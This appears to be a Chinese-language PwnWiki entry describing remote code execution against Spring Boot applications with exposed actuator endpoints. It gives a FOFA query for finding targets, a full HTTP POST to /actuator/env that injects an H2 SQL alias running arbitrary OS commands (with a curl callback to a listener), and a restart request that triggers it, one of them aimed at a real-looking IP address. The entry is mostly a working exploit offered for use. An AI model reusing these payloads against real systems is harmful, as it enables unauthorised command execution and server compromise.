免费、自由、人人可编辑的漏洞库
,
漏洞影响
Spring Boot < 1.5 Spring Boot >= 1.5
FOFA
body="Whitelabel Error Page"
漏洞利用
访问以下URL:
http://x.x.x.x:port/actuator
发送如下POST包配置spring.datasource.hikari.connection-test-query的值。
POST /actuator/env HTTP/1.1 Host: xxx.xxx.xxx.xxx Content-Type: application/json Content-Length: 389 {"name":"spring.datasource.hikari.connection-test-query","value":"CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()); if (s.hasNext()) {return s.next();} throw new IllegalArgumentException();}'; CALL EXEC('curl x.x.x.x:port');"}
NC监听,向端点 /actuator/restart 发送POST请求, 重启应用。
POST /actuator/restart HTTP/1.1 Host: 39.105.93.185:8080 Content-Type: application/json Content-Length: 356 {}
免费、自由、人人可编辑的漏洞库--PwnWiki.com